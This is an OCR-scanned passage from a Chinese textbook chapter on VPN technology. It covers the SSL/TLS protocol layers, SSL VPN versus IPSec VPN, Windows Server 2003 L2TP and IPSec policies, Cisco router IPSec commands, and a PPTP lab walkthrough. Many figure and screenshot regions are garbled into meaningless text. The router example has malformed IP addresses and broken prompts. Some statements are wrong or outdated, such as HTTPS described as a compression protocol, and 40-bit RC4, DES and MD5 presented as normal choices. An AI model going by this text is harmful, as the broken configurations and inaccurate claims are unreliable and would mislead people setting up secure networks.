的 认证 ; 经 认证 的 服务 器 发 送 一 个 提问 给 客户 ,客户 则 返回 (数字 ) 签 名 后 的 提问 和 其 公开 
密 钥 ,从 而 向 服务 器 提供 认证 。 

2) SSL 协议 结构 

SSL 协议 位 于 TCP/IP 协议 模型 的 网 络 层 和 应 用 层 之 间 , 使 用 TCP 来 提供 一 种 可 靠 的 
端 到 端的 安全 服务 , 它 使 客户 /服务 器 应 用 之 间 的 通信 不 被 攻击 窃听 ,并 且 始 终 对 服务 器 进 
行 认证 ,还 可 以 选择 对 客户 进行 认证 。SSL 协议 在 应 用 层 通 信之 前 就 已 经 完成 加 密 算法 、 
通信 密 钥 的 协商 以 及 服务 器 认证 工作 ,在 此 之 后 ,应 用 层 协议 所 传送 的 数据 都 被 加 密 。SSL 
实际 上 由 共同 工作 的 两 层 协议 组 成 ,如 表 8-4 所 示 。 从 体系 结构 图 可 以 看 出 SSL 安全 协议 
实际 是 SSL 握手 协议 .SSL 修改 密 文 协 议 、SSL 报警 协议 和 SSL 记录 协议 组 成 的 一 个 协 


表 8-4 SSL 体系 结构 


握手 修改 密 报警 
协议 文 协 议 协议 
SSL 记录 协议 


TCP 
IP 
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SSL 握手 协议 允许 通信 实体 在 交换 应 用 数据 之 前 协商 密 钥 的 算法 ,加密 密 钥 和 对 客户 
端 进行 认证 (可 选 ) 的 协议 ,为 下 一 步 记录 协议 要 使 用 的 密 钥 信息 进行 协商 ,使 客户 端 和 服务 
器 建立 并 保持 安全 通信 的 状态 信息 。SSL 握手 协议 是 在 任何 应 用 程序 数据 传输 之 前 使 用 
的 。SSL 握手 协议 包含 四 个 阶段 :第 一 个 阶段 建立 安全 能 力 ,第 二 个 阶段 服务 器 鉴别 和 密 
钥 交换 ,第 三 个 阶段 客户 鉴别 和 密 钥 交换 ,第 四 个 阶段 完成 握手 协议 ,如 图 8-23 所 示 。 


Client Server 


Phase 1 

Establish security capabilities, including 
protocol version, session ID, cipher suite, 
compression method, and initial random 
numbers. 


client hello 


Phase 2 

Server may send certificate, key exchange, 
and request certificate. Server signals end 
of hello message phase. 


server hello 3076 
Certificate 
Phase 3 


Time 


cli : z ? à 
lient key oy chan, Client sends certificate if requested, Client 

m sd sends key exchange, Client may send 
Sficate eri certificate verification. 


Change (i er spec 


finisheq 
Phase 4 


Change cipher suite and finish 
change cipher SP handshake protocol. 


图 8-23 SSL 协议 四 个 工作 阶段 


SSL 修改 密 文 协议 是 使 用 SSL 记录 协议 服务 的 SSL 高 层 协议 的 三 个 特定 协议 之 一 , 协 
议 由 单个 消息 组 成 ,该 消息 只 包含 一 个 值 为 1 的 单个 字 节 。 该 消息 的 唯一 作用 就 是 使 未 决 
状态 复制 为 当前 状态 ,更 新 用 于 当前 连接 的 密码 组 。 为 了 保障 SSL 传输 过 程 的 安全 性 , 双 
方 应 该 每 隔 一 段 时间 改 变 加 密 规 范 。 

SSL 报警 协议 是 用 来 为 对 等 实体 传递 SSL 的 相关 警告 。 如 果 在 通信 过 程 中 某 一 方 发 
现任 何 异 常 ,就 需要 给 对 方 发 送 一 条 警示 消息 通告 。 警示 消 息 有 两 种 :第 一 种 是 Fatal 错 
误 , 如 传递 数据 过 程 中 ,发 现 错误 的 MAC, 双 方 就 需要 立即 中 断 会 话 , 同 时 消除 自己 缓冲 
相应 的 会 话 记录 ; 第 二 种 是 Warning 消息 ,这 种 情况 ,通信 双方 通常 都 只 是 记录 日 志 , 而 对 
通信 过 程 不 造成 任何 影响 。SSL 握手 协议 可 以 使 得 服务 器 和 客户 能 够 相互 鉴别 对 方 ,协商 
具体 的 加 密 算法 和 MAC 算法 以 及 保密 密 钥 ,用 来 保护 在 SSL 记录 中 发 送 的 数据 。 
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SSL 记录 协议 为 SSL 连接 提供 了 两 种 服务 :一 是 机 密 性 ,二 是 消息 完整 性 。 为 了 实现 
这 两 种 服务 ，SSL 记录 协议 对 接收 的 数据 和 被 接收 的 数据 工作 过 程 是 如 何 实现 的 呢 ? SSL 
记录 协议 接收 传输 的 应 用 报 文 ,将 数据 分 片 成 可 管理 的 块 ,进行 数据 压缩 (可 选 ) ,应 用 
MAC ,接着 利用 IDEA、.DES .3DES 或 其 他 加 密 算法 进行 数据 加 密 , 最 后 增加 由 内 容 类 型 、 
主要 版 本 ,次 要 版 本 和 压缩 长 度 组 成 的 首部 。 被 接收 的 数据 刚好 与 接收 数据 工作 过 程 相反 ， 
依次 被 解密 、 验 证 、 解 压缩 和 重新 装配 ,然后 交 给 更 高 级 用 户 。 

3) HTTPS 协议 

HTTPS 协议 用 于 对 数据 进行 压缩 和 解压 操作 ,并 返回 网 络 上 传送 回 的 结果 。HTTPS 
应 用 SSL 作为 HTTP 应 用 层 的 子 层 ,使 用 端口 443。SSL 使 用 40 位 关键 字 作 为 RC4 流 加 
密 算法 ; HTTPS 和 SSL 支持 使 用 X. 509 数字 认证 。HTTPS 是 以 安全 为 目标 的 HTTP 通 
道 , 即 HTTP 下 加 入 SSL 层 ,HTTPS 的 安全 基础 是 SSL, 因 此 加 密 机 制 依托 于 SSL. 

4) TLS 

TLS(transport layer security ,传输 层 安全 协议 ) 是 IETF 制定 的 一 种 新 的 协议 ,建立 在 
SSL 3.0 协议 规范 之 上 ,是 SSL 3.0 的 后 续 版 本 。 在 TLS 与 SSL 3. 0 之 间 存 在 着 显著 差 
别 , 主 要 是 它们 支持 的 加 密 算法 不 同 ,所 以 TLS SSL 3.0 不 能 互 操作 。 


5. SSL VPN 的 主要 优势 和 不 足 


SSL VPN 相对 传统 的 技术 存在 一 些 优点 ,当然 不 足 之 处 通常 也 是 有 的 ,下 面 就 分 别 予 
以 介绍 。 

1) SSL VPN 的 主要 优点 

SSL VPN 的 主要 优点 如 下 。 

CD 无 须 安装 客户 端 软件 : 大 多 数 执行 基于 SSL 协议 的 远程 访问 不 需要 在 远程 客户 端 
设备 上 安装 软件 ,只 需 通过 标准 的 Web 浏览 器 连接 因特网 , 即 可 以 通过 网 页 访问 到 企业 总 
部 的 网 络 资源 。 

(2) 适用 于 大 多 数 设备 : 基于 Web 访问 的 开放 体系 在 运行 标准 的 浏览 器 下 可 以 访问 任 
何 设备 ,包括 非 传统 设备 ,如 可 以 上 网 的 电话 和 PDA 通信 产品 。 

(3) 适用 于 大 多 数 操作 系统 : 可 以 运行 标准 的 因特网 浏览 器 的 大 多 数 操作 系统 都 可 以 
用 来 进行 基于 Web 的 远程 访问 ,不管 是 Windows, UNIX 还 是 Linux。 

(4) 支持 网 络 驱动 器 访问 : 用 户 通过 SSL VPN 通信 可 以 访问 在 网 络 驱动 器 上 的 资源 。 

(5) 良好 的 安全 性 : 用 户 通过 基于 SSL 的 Web 访问 并 不 是 网 络 的 真实 节点 ,就 像 
IPSec 安全 协议 一 样 。 而 且 还 可 代理 访问 公司 内 部 资源 。 因 此 ,这 种 方法 可 以 非常 安全 , 特 
别 是 对 于 外 部 用 户 的 访问 。 

(6) 较 强 的 资源 控制 能 力 : 基于 Web 的 代理 访问 允许 公司 为 远程 访问 用 户 进行 详尽 的 
资源 访问 控制 。 

CD) 减少 费用 : 基于 SSL 的 VPN 网 络 可 以 非常 经 济 地 为 那些 简单 远程 访问 用 户 ( 仅 需 
进入 公司 内 部 网 站 或 者 进行 E-mail 通信 ) 提 供 远 程 访问 服务 。 

(8) 可 以 绕 过 防火 墙 和 代理 服务 器 进行 访问 : 基于 SSL 的 远程 访问 ,使 用 NAT 服务 的 
远程 用 户 或 者 因特网 代理 服务 的 用 户 可 以 绕 过 防火 墙 和 代理 服务 器 访问 公司 资源 ,基于 
IPSec 的 远程 访问 是 做 不 到 的 。 
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2) SSL VPN 的 主要 不 足 之 处 

SSL VPN 的 主要 不 足 之 处 如 下 。 

(1) 必须 依靠 因特网 进行 访问 : 通过 基于 SSL VPN 的 远程 访问 ,必须 与 因特网 保持 连 
通 性 ; Web 浏览 器 实质 上 扮演 客户 服务 器 的 角色 ,远程 用 户 的 Web 浏览 器 依靠 公司 的 服务 
器 进行 所 有 通信 。 

(2) 对 新 的 或 者 复杂 的 Web 技术 提供 有 限 支持 : 基于 SSL 的 VPN 是 依赖 反 代 理 技术 
来 访问 公司 网 络 。 远 程 用 户 从 公用 因特网 来 访问 公司 网 络 ,而 公司 内 部 网 络 信息 处 于 防火 
墙 后 面 ,而 且 处 于 没有 内 部 网 IP 地 址 路 由 表 的 空间 中 。 反 代理 的 工作 就 是 翻译 出 远程 用 户 
Web 浏览 器 的 需求 ,SSL 很 难 支持 。 

。 只 能 有 限 地 支持 Windows 应 用 或 者 其 他 非 Web 系统 ,因为 大 多 数 基于 SSL 的 

VPN 都 是 基于 Web 浏览 器 工作 的 ,远程 用 户 不 能 在 Windows, UNIX, Linux, 
AS400 或 者 大 型 系统 上 进行 非 基于 Web 界面 的 应 用 。 

。 只 能 为 访问 资源 提供 有 限 安全 保障 ,基于 SSL 的 Web 浏览 器 进行 VPN 通信 时 ,对 
用 户 来 说 外 部 环境 并 不 安全 、 可 达到 无 缝 连接。 因为 SSL VPN 只 对 通信 双方 的 某 
个 应 用 通道 进行 加 密 , 而 不 是 对 在 通信 双方 的 主机 之 间 的 整个 通道 进行 加 密 。 

6. SSL VPN 5 IPSec VPN 比较 列表 

K 8-5 是 SSL VPN 与 IPSec VPN 主要 性 能 比较 ,从 表 中 可 以 看 出 各 自 的 主要 优势 与 不 足 。 

表 8-5 SSL VPN 与 IPSec VPN 主要 性 能 比较 


选项 SSL VPN IPSec VPN 
单 向 身份 验证 - 
身份 验证 双向 身份 验证 a 
数字 证 书 
: 强加 密 强加 密 
iii 基于 Web 浏览 器 m 
SETAN 端 到 端 安全 网 络 边缘 到 客户 端 
从 客户 到 资源 端 全 程 加 密 仅 对 从 客户 到 VPN 网 关 之 间 通道 加 密 
可 访问 性 选用 于 任何 时 间 ,任何 地 点 访问 | 限制 适用 于 已 经 定义 好 受 控 用 户 的 访问 
费用 低 (无 须 任何 附加 客户 端 软 件 ) | 高 (需要 管理 客户 端 软件 
即 插 即 用 安装 
通常 需要 长 时 间 的 配置 
安装 ead AA pi 


对 用 户 非常 友好 ,使 用 非常 熟悉 
用 户 的 易 使 用 性 的 Web 浏览 器 无 需 终 端 用 户 的 
培训 

基于 Web 的 应 用 

支持 的 应 用 文件 共享 

E-mail 

客户 、 合 作 伙伴 用 户 、 远 程 用 户 、 


对 没有 相应 技术 的 用 户 比 较 困难 需要 培训 


所 有 基于 IP 协议 的 服务 


用 户 更 适用 于 企业 内 部 使 用 


在 服务 器 端 容易 实现 自由 仲 缩 ,在 客户 端 比 
较 困难 


可 伸缩 性 容易 配置 和 扩展 
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图 8-24. [8 8-25 分 别 是 IPSec VPN 与 SSL VPN 构建 方式 。 


9 远程 移动 用 户 


业务 、 办 公 区 


分 支 机 构 1 
"n A 
业务 、 办 公 区 
* 防火 墙 
Web Server 
p 分支 机 构 2 
IN 
4 
OA Server \ 防 火 墙 | 业务 、 办 公 区 
分 支 机构 3 
Hg 8 
Mail Server 防火 二 WE. JAK 
数据 中 心 区 


图 8-24 IPSec VPN 


Web 服 务 器 


图 8-25 SSL VPN 


由 于 企业 的 争 相 部 署 ,SSL VPN 已 经 取得 了 很 大 的 发 展 。 同 时 ,由 于 许多 网 络 公司 已 
经 将 该 技术 集成 到 其 当前 产品 线 中 ,最 终 将 与 企业 各 自 的 管理 应 用 相 结合 ,将 来 SSL VPN 
会 越 来 越 辉 煌 。 


8.5 Windows Server 2003 的 VPN 技术 


Windows Server 2003 家 族 中 支持 VPN 通信 ,并 且 增 加 了 许多 新 的 特性 。Windows 
Server 2003 的 VPN 支持 NAT, 支 持 用 户 以 L2TP 的 方式 访问 VPN 服务 器 及 内 网 。 
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8.5.1 Windows Server 2003 系统 L2TP VPN 


Windows Server 2003 提供 两 种 隧道 协议 : PPTP 和 附带 IPSec 的 L2TP, 可 以 方便 地 
创建 VPN., 


1. PPTP 


PPTP 是 Windows NT 4.0 的 VPN 协议 ,建立 在 PPP 基础 之 上 ,提高 了 PPP 的 安全 级 
别 ,让 PPP 对 PPTP 服务 器 与 PPTP 客户 机 之 间 的 数据 加 密 传 输 , 并 使 PPTP 服务 器 对 远 
程 用 户 的 身份 进行 验证 。 

具体 的 过 程 是 :一 个 PPTP 客户 机 通过 两 次 拨号 连接 来 建立 一 条 PPTP 隧道 ,第 一 次 通 
过 PPP 协议 与 ISP 建立 连接 ,第 二 次 在 上 一 次 的 PPP 连接 的 基础 上 再 次 “拨号 ?建立 一 个 与 
企业 局 域 网 的 PPTP 服务 器 的 VPN 连接 。 在 局 域 网 中 也 可 以 使 用 PPTP, 如 果 客 户 机 直接 连 
接 到 TP 局 域 网 ,并 且 和 服务 器 建立 了 一 个 耳 连 接 ,就 可 以 通过 局 域 网 建立 PPTP 隧道 。 


2. 带 IPSec 的 L2TP 


带 IPSec 的 L2TP 是 Windows Server 2003 的 隧道 协议 。L2TP 隧道 化 数据 包 格 式 如 
图 8-26 所 示 。 


IP 标 头 |UDP 标 头 |L2TP 标 头 | PPP 标 头 | PPP 负载 (IP 数 据 报 ) 


UDPS |L2TP 标 类 | PPP 标 头 | PP 负载 (iP 数据 报 ) | n: tps 


IPSE | ESP 慰 类 身份 验证 尾 让 


T 
由 IPSec 加 密 
图 8-26 带 IPSec 的 L2TP 隧道 化 数据 包 


L2TP 所 使 用 的 IPSec 安全 策略 是 由 RAS 管理 服务 专门 创建 ,不 是 使 用 默认 的 IPSec 
策略 或 某 个 用 户 创 建 的 IPSec 策略, 这 一 点 与 后 面 介绍 的 Windows 2003 IPSec 策略 在 使 用 
模式 上 不 同 。 

L2TP 负责 为 任意 类 型 的 网 络 通信 提供 封装 和 隧道 管理 ,传输 模式 的 IPSec 提供 L2IP 
隧道 数据 包 的 安全 。L2TP 安全 机 制 依赖 于 IPSec, 所 以 基于 L2TP 的 VPN 连接 是 L2TP 
和 IPSec 的 组 合 ,连接 的 两 个 网 络 中 的 VPN 服务 器 必须 支持 L2TP 和 IPSec, 

L2TP 将 原始 数据 包 封 装 在 PPP 帧 内 并 进行 压缩 ,在 UDP 类 型 的 数据 包 内 部 指派 端 
口 1701。 因 为 UDP 数据 包 格 式 是 卫 包 ,所 以 根据 L2TP 隧道 的 用 户 配 置 中 的 安全 设置 ， 
L2TP 自动 使 用 IPSec 保护 隧道 。 

L2TP/IPSec VPN 安全 机 制 实现 了 计算 机 与 计算 机 之 间 的 信任 。 


8.5.2 Windows Server 2003 系统 IPSec 策略 


Windows Server 2003 通过 实现 基于 策略 的 IPSec 管理 避免 了 大 幅度 增加 管理 开销 , 简 
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化 了 网 络 安全 性 的 配置 和 管理 。 

Windows Server 2003 IPSec 安全 通过 与 Windows Server 2003 域 和 活动 目录 服务 集 
成 ,建立 在 IETF IPSec 结构 上 。 活动 目录 使 用 组 策略 向 Windows Server 2003 域 成 员 提供 
IPSec 策略 指定 和 分 配 。 

IKE 的 实现 提供 了 3 种 基于 IETF 标准 的 身份 认证 方法 ,以 在 计算 机 之 间 建 立信 任 
关系 。 

(I) 基于 Windows Server 2003 的 域 基础 结构 提供 的 Kerberos V5. 0 身份 认证 方法 用 
于 在 同一 域 中 或 信任 的 域 之 间 的 计算 机 中 配置 安全 通信 。 

(2) 公开 /私有 密 钥 使 用 与 包括 Microsoft, Entrust, VeriSign, Netscape 在 内 的 认证 系 
统 兼 容 的 认证 进行 签名 。 

(3) 密码 和 预 共享 身份 认证 密 钥 严格 地 用 在 为 应 用 程序 数据 包 保护 建立 的 信任 上 。 

一 旦 端 计算 机 通过 了 相互 身份 认证 ,它们 会 为 加 密 应 用 程序 数据 包 的 目的 产生 整体 加 
密 密 钥 。 这 些 密 钥 仅 被 这 两 台 计算 机 知道 ,所 以 它们 的 数据 被 很 好 地 保护 起 来 ,防止 了 网 络 
上 可 能 的 攻击 者 对 数据 进行 修改 或 翻译 。 

Windows Server 2003 预定 义 了 3 种 IP 安全 策略 ,用 户 可 以 根据 实际 通信 需要 自行 创 
建新 的 IP 安全 策略 。 

(1) 客户 端 (只 响应 )。 这 是 一 个 计算 机 策略 示例 ,其 根据 请 求 而 保护 通信 。 例 如 ， 
Intranet 客户 机 可 能 不 需要 IPSec, 除 非 另 一 台 计 算 机 发 出 请 求 。 该 策略 允许 其 活动 的 计算 
机 正确 响应 安全 通信 请 求 ,该 策略 包含 默认 响应 规则 ,该 规则 根据 正在 保护 的 通信 为 人 站 与 
出 站 创建 动态 IPSec 筛选 器 。 

(2) 服务 器 (请 求 安全 设置 )。 这 是 一 个 在 多 数 情 况 下 保护 通信 的 计算 机 策略 示例 , 同 
时 也 允许 与 不 支持 IPSec 的 计算 机 进行 不 安全 通信 。 在 该 策略 中 ,计算 机 接受 不 安全 通信 ， 
但 总 是 通过 从 原始 发 送 方 那里 请 求 安全 性 来 试图 保护 其 他 通信 。 如 果 另 一 台 计算 机 没有 启 
用 IPSec, 则 该 策略 允许 整个 通信 都 是 不 安全 的 。 

(3) 安全 服务 器 (要 求 安 全 设置 )。 这 是 一 个 在 Intranet 上 要 求 进行 安全 通信 的 计算 机 
策略 示例 ,如 传输 高 度 敏感 的 数据 的 服务 器 。 管 理 员 可 将 该 IPSec 策略 作为 示例 创建 自己 
用 于 生产 的 策 自 定义 IPSec 策略 。 在 该 略 中 使 用 的 筛选 器 要 求 对 所 有 出 站 通信 进行 保护 ， 
同时 允许 不 保护 的 初始 入 站 通信 请 求 。 

要 测试 该 策略 的 使 用 情况 ,应 把 该 策略 指派 给 服务 器 计算 机 ,并 把 “客户 端 (只 响应 )" 策 
略 指派 给 客户 端 计算 机 , 当 客户 端 计算 机 试图 与 服务 器 通信 时 ,服务 器 将 请 求 安全 的 通信 。 
此 外 ,不 支持 IPSec 性 能 的 计算 机 无 法 与 服务 器 建立 连接 。 


8.5.3 Windows Server 2003 系统 SSL VPN 


Windows Server 2003 IIS 的 身份 认证 除了 匿名 访问 、 基 本 验证 和 Windows NT 请 求 / 
响应 模式 外 ,还 有 一 种 安全 性 更 高 的 认证 ,就 是 通过 SSL 安全 机 制 使 用 数字 证 书 。SSL 位 
T HTTP 和 TCP 层 之 间 , 建 立 用 户 与 服务 器 之 间 的 加 密 通 信 , 确 保 所 传递 信息 的 安全 性 。 
SSL 是 工作 在 公共 密 钥 和 私人 密 钥 基础 上 的 ,任何 用 户 都 可 以 获得 公共 密 钥 来 加 密 数 据 ， 
但 解密 数据 必须 要 通过 相应 的 私人 密 钥 。 使 用 SSL 安全 机 制 时 ,首先 客户 端 与 服务 器 端 建 
立 连接 ,服务 器 把 它 的 数字 证 书 与 公共 密 钥 一 并 发 送 给 客户 端 ,客户 端 随机 生成 会 话 密 钥 ， 
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用 从 服务 器 得 到 的 公共 密 钥 对 会 话 密 钥 进行 加 密 , 并 把 会 话 密 钥 在 网 络 上 传递 给 服务 器 ,而 
会 话 密 钥 只 有 在 服务 器 端 用 私人 密 钥 才能 解密 ,这 样 , 客 户 端 和 服务 器 就 建立 了 一 个 唯一 的 
安全 通道 。 建 立 了 SSL 安全 机 制 后 ,只 有 SSL 允许 的 客户 端 才能 与 SSL 允许 的 Web 站 点 
进行 通信 ,并 且 在 使 用 URL 资源 定位 器 时 ,输入 https://, 而 不 是 http://。 


6.6 基于 路 由 器 的 IPSec VPN 配置 


IPSec VPN 的 配置 一 般 分 为 四 步 : 配置 IKE 的 协商 ,配置 IPSec 的 协商 ,配置 端口 的 应 
用 ,调试 并 排 错 。 
(D 启动 IKE: 


Router(config) # crypto isakmp enable 
(2) 建立 IKE 协商 策略 : 
Router(config) # crypto isakmp policy priority 
(3) 配置 IKE 协商 策略 ; 


Router(config- isakmp) # authentication pre- share 
Router(config- isakmp) # encryption ( des | 3des ] 
Router(config - isakmp) # hash ( md5 | shal } 
Router(config ~ isakmp) # lifetime seconds 


(4) 设置 共享 密 钥 和 对 端 地 址 : 
Router(config) # crypto isakmp key keystring address peer-address 
(5) 设置 传输 模式 集 : 


Router (config) # crypto ipsec transform - set transform - set - name transforml [transform2 
[transform3]] 


(6) 配置 保护 访问 控制 列表 : 


Router(config)# access - list access - list - number (deny | permit] protocol source source— 


wildcard destination destination - wildcard 

(7) 创建 Crypto Maps: 

Router(config)£ crypto map map - name seq- num ipsec- isakmp 
(8) 配置 Crypto Maps: 


Router(config - crypto- map) # match address access - list - number 
Router(config - crypto- map) # set peer ip address 
Router(config - crypto- map) set transform- set name 


(9) 应 用 Crypto Maps 到 端口 ; 


Router(config) interface interface name interface num 
Router(config- if) crypto map map - name 
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(10) 查看 IKE 策略 : 


Router# show crypto isakmp policy 


(11) 查看 IPSec 策略 : 


Router # show crypto ipsec transform- set 


(12) 查看 SA 信息 : 


Router# show crypto ipsec sa 


(13) 查看 加 密 映 射 : 


Router# show crypto map 


图 8-27、 图 8-28 分 别 为 拓扑 结构 及 其 操作 步骤 。 
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图 8-27 拓扑 结构 


RouterA(config)#ip route 0.0.0.0.0.0.0.0 20.20.20.20 
RouterA(configj#crypto isakmp policy 1 

RouterA(config-isakmap)#hash md5 
RouterA(config-isakmap)#authentication pre-share 
RouterA(configj#crypto isakmp key benet-password address 20.20.20.20 
RouterA(config)écrypto ipsec transform-set benetset ah-md5-hmac 
esp-des 

RouterA(config)£access-list 101 permit ip 50.50.50.0.0.0.0.255 60.60.60.0 
0.0.0.255 

RouterA(configj#crypto map benetmap 1 ipsec-isakmp 
RouterA(config-crypto-map set peer 20.20.20.20 
RouterA(config-crypto-map Jéset transform-set benetset 
RouterA(config-crypto-map)Amatch address 101 


RouterA(config)Zinterface serial 0/0 
RouterA(config-if)? crypto map benetmap m". 
图 8-28 操作 步骤 


什么 是 VPN? VPN 的 系统 特性 有 哪些 ? 

IPSec 协议 包含 的 各 个 协议 之 间 有 什么 关系 ? 

说 明 AH 的 传输 模式 和 隧道 模式 ,它们 的 数据 包 格式 是 什么 样 的 ? 
说 明 ESP 的 传输 模式 和 隧道 模式 ,它们 的 数据 包 格式 是 什么 样 的 ? 
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5. IKE 的 作用 是 什么 ?SA 的 作用 是 什么 ? 

6. SSL 工作 在 哪 一 层 ? 工作 原理 是 什么 ? 

7. 对 SSL VPN 与 IPSec VPN 进行 简单 的 比较 。 
8. L2TP 协议 的 优点 是 什么 ? 


G 8.1 Windows Server 2003 的 L2TP VPN 配置 


【 实 训 目 的 】 

Windows Server 2003 支持 PPTP fil L2TP 的 VPN 数据 链 路 层 隧道 协议 ,在 Windows 
Server 2003 服务 器 端 通过 “路 由 和 远程 访问 ”就 能 创建 VPN 服务 器 ,接受 远程 “虚拟 专用 连 
JE", fii Windows Server 2003 计算 机 成 为 VPN 服务 器 ,在 客户 端 和 VPN 服务 器 建立 安全 
连接 。 

【 实 训 环 境 】 

(1) 一 台 装 有 Windows Server 2003 的 计算 机 作为 VPN 服务 器 。 

(2) 一 台 装 有 Windows Server 2003( 或 Windows XP) 的 计算 机 作为 客户 端 。 

【 实 训 内 容 】 


1. 配置 PPTP 服务 端 


(1) 打开 “管理 工具 ”, 运 行 “路 由 和 远程 访问 "服务 ,“ 路 由 和 远程 访问 "默认 是 禁用 的 ， 
右 击 服务 器 图 标 ,选择 “配置 并 启用 路 由 和 远程 访问 ”, 如 图 8-29 所 示 。 在 安装 向 导 中 单 击 
“下 一 步 ” 按 钮 。 


$29 启用 路 由 和 远程 访问 


(2) 在 弹出 的 对 话 框 中 ,选中 “远程 访问 (拨号 或 VPN)”, 单 击 “ 下 一 步 ? 按 钮 ,选中 
VPN, 单 击 “ 下 一 步 ” 按 钮 。 
(3) 在 弹出 的 对 话 框 中 选中 默认 设置 , 单 击 * 下 一 步 ? 按 钮 ,如 图 8-30 所 示 。 
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Som NERA nen 
mmi! 
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m 连接 
Ett ve 客户 端 连 接 到 此 服务 器 ， 至少 要 有 一 个 网 络 接口 连接 到 
Internet, 


I |: 
SUC EZ Card 10/10... 192. 168.0.55 


图 8-30 配置 VPN 


(4) 在 “IP 地 址 指定 "对 话 框 中 ,选中 "来 自 一 个 指定 的 地 址 范围 ，, 单 击 * 下 一 步 " 按 钮 。 

(5) 在 “地址 范围 指定 ”选项 组 中 , 单 击 “ 新 建 ”, 出 现 “新 建 地 址 范围 "对 话 框 ; 设置 “起 
始 IP 地 址 ”为 192. 168. 0. 51,“ 结 束 IP 地 址 ”为 192. 168. 0. 58, 单 击 “ 确 定 ” 按 钮 ,返回 上 一 
级 对 话 框 。 此 时 可 看 到 地 址 范围 已 添加 成 功 , 单 击 * 下 一 步 " 按 钮 ,如 图 8-31 所 示 。 


新 建 地 址 范围 
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(6) 在 “路 由 和 远程 访问 服务 器 安装 向 导 ? 对 话 框 中 ,保持 默认 设置 , 单 击 “下 一 步 ? 按 
钮 , 单 击 “ 完 成 ”按钮 ,结束 服务 器 配置 。 然 后 计算 机 开始 启动 路 由 服务 ,如 图 8-32 所 示 。 

C) 打开 “计算 机 管理 "窗口 ,分别 创建 一 个 用 户 r_user, 一 个 组 r_userg, 且 使 r_user 素 
属于 r_userg。 用 户 r_user" 拨 入 "属性 设置 如 图 8-33 Bros. 


图 8-32 启动 路 由 服务 图 8-33 设置 氢 入 属性 


(8) 回 到 “路 由 和 远程 访问 "窗口 ,选择 “远程 访问 策略 ”, 右 侧 窗 格 默认 显示 “身份 验证 _ 
连接 VPN”, 如 图 8-34 所 示 。 


图 8-34 VPN 连接 


右 击 “ 身 份 验证 连接 VPN”, 选 择 “ 属 性 ”, 出 现 如 图 8-35 所 示 的 对 话 框 ; 单 击 “ 删 除 ” 按 
钮 ,删除 默认 条 件 。 

在 “身份 验证 _ 连 接 VPN 属性 ”对 话 框 中 , 单 击 “ 添 加 ”按钮 ,打开 “选择 属性 ”对 话 框 ; 选 
择 Windows-Groups, 单 击 “ 添 加 ”按钮 ,弹出 如 图 8-36 所 示 的 对 话 框 。 
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图 8-36 添加 组 


(9) 选择 r_userg , 单 击 “ 确 定 "按钮 , 回 到 “身份 验 证 连接 VPN 属性 ”对 话 框 ; 选择 “ 授 
予 远 程 访 问 权限 ”, 如 图 8-37 所 示 。 


全 其 他 访问 最 务 器 的 连接 EE 


图 8-37 授予 远程 访问 权限 
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(10) 在 “身份 验证 _ 连 接 VPN 属性 ”对 话 框 中 单 击 “ 编 辑 配 置 文件 ”按钮 , 即 可 进行 身份 
验证 和 加 密 配 置 , 单 击 “ 确 定 ” 按 钮 ,结束 配置 ,如 图 8-38 和 图 8-39 所 示 。 


RERAREXA KEJ 
搞 入 限制 | IF。 smm sexum |am | 一 一 IEECIITTE EMI | 
IRGSfIOEERRIDR IUE. Microsoft 路 册 和 运程 访问 的 服务 器 云 持 下 | l, in 
2 A A PRDEDARS E, WAUA 
V Microsoft MESARE 2 15-CHAP v2) O et E. ne eE me 
E APTUESBYMEERT O EEA] 
IV Microsoft 加 密 身份 验证 0E-CHAP) W) F MEE PE SS ÉD C) 
用 户 可 以 在 密码 过 期 后 更 改 它 O P auam us OO 
T- MESHE Co) W 
厂 未 加 密 的 身份 验证 (PAP，SPAP) W r v 
未 经 身份 验证 的 访问 
厂 JE PRSRETTEREEIOREA EE (D 
mz | mà | ERO —m | sso | 
图 8-38 身份 验证 图 8-39 ”加 密 配置 


(QD 在 “网 络 连接 ”窗口 可 看 到 * 传 人 的 连接 ”图标 ,表示 服务 器 端 等 待 客户 端 建立 连接 。 
(12) 如 图 8-40 所 示 ,在 命令 提示 符 界面 ,输入 命令 ipconfig/all 可 以 看 到 其 网 卡 IP 地 
RUE ER WAN-CPPP/SLIP- kht, E 专用 网 地 址 
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图 8-40 虚拟 地 址 


2. 配置 PPTP 客户 端 


(1) 打开 “网 络 连接 "窗口 ,双击 “新 建 连接 ”; 在 打开 的 “新 建 连接 向 导 ” 对 话 框 中 , 单 击 


bh“ 虚拟 专用 网 络 连接 " 单 选 按钮 ,如 图 8-41 所 示 。 


“下 一 步 ?按钮 ; aen 


欢迎 使 用 新 建 连接 向 导 


此 疝 导 格 帮助 您 
* 连接 到 Internete 
* 连接 到 专用 网 络 ， 例 如 您 的 办 公 网 络 ， 


要 继续 ， 请 单 击 “ 下 一 步 " 


新 建 连 接 向 导 E 
RAER 
您 想 要 在 工作 点 如 何 与 网 络 连接 ? 
BRETAJESR 
C 撤 号 连接 @) 
be ， 或 通过 综合 业务 数字 网 CSI) 电话 线 连 
6 ENEERIISEENE QD. 
使 用 虚拟 专用 网 络 (好 及 通过 Internet 连接 到 网络。 
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《上 一 步 @ | 下- 步 中 )] ma 


图 8-41 客户 端 网 络 连接 


(2) 如 图 8-42 所 示 ,输入 VPN 服务 器 的 IP 地 址 , 单 击 * 下 一 步 "按钮 。 


wi 服务 器 选择 < 
very 服务 器 的 名 称 或 地 址 是 什么 ? f| 


输入 您 正 连接 的 计算 机 的 主机 名 或 IP 地 址 。 
主机 名 或 地 址 GIO, microsoft. con 或 157.54.0.1) 00: 
i92. 166.0. 58] 
corso 取消 


图 8-42 VPN 服务 器 地 址 
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(3) 在 对 话 框 
保持 默认 设置 ， 


如 图 8-43 所 示 。 
(4) 在 “网 络 虚拟 连接 ”窗口 中 ,双击 所 建 的 连接 图 标 ; 在 弹出 的 对 话 框 中 ,输入 用 户 名 


连接 "按钮 ,与 服务 器 建立 连接 ,如 图 8-44 所 示 。 


和 密码 , 单 击 " 


正在 完成 新 建 连接 向 导 
您 已 成 功 完成 建 下 列 连 捧 天 要 的 步骤 


虚拟 专用 同 络 连接 
。 与 此 计算 机 上 的 所 有 用 户 共享 


HERRERA “FRATER” KAR. 


图 8-43 客户 端 配置 完成 


保持 默认 设置 , 单 击 * 下 一 步 ?按钮 ; fe" Internet 连接 共享 "对话 框 中 也 
单 击 “ 下 一 步 ” 按 钮 ; 选择 "可 修改 连接 名 称 ”, 单 击 * 完 成 ”结束 客户 端 配置 
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图 8-44 客户 端 连接 


